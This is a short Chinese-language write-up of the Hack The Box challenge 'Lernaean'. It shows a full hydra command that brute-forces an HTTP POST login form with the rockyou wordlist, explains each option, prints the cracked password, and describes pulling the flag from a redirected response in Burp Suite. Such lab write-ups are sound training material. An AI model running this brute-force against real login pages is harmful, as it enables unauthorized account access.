HTB(hack the box) Lernaean
接着上一次的。
题目:
提示:
你的目标不是很擅长电脑。试着猜猜他们的密码,看看他们是否隐藏了什么!
打开网页:
不就是暴力破解密码么。使用hydra来破解。
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 30206
-l:指定用户名
-P:指定密码字典文件
-t:线程数
http-post-form:表明是post请求
“/:password=^PASS^:Invalid password!” 分别是目标网页位置:需要破解的字段:猜测错误的出现的字段(可以自定义)
-s:端口号
结果:
root@kali:~# hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 30206
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-12 20:35:57
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://docker.hackthebox.eu:30206/:password=^PASS^:Invalid password!
[STATUS] 308.00 tries/min, 308 tries in 00:01h, 14344091 to do in 776:12h, 64 active
[30206][http-post-form] host: docker.hackthebox.eu login: admin password: leonardo
就得到了密码。登录:
它告诉你,太慢。。。。。
观察url,被重定向了。使用burpsuite来抓包。观察response。
红色遮挡的就是flag。